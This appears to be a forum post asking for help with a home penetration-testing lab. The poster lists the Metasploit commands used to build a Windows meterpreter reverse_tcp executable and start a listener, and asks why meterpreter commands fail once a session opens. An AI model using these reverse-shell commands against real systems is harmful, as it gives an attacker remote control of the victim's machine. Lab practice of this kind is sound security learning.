here is what I am trying:
My attacking computer is a laptop running backtrack 5 r3 KDE 64
msfpayload windows/meterpreter/reverse_tcp LHOST=(ur ip) X > Desktop/(name.exe)
I then moved the payload onto my test computer. It is on the same network running windows 7, firewall and antivirus down.
set payload windows/meterpreter/reverse_tcp
set lhost (ur ip)
exploit -j -z
Then I start the exe and it says I have a session but if I try to use any meterpreter commands it says its an unknown command: meterpreter.
Any help would be great!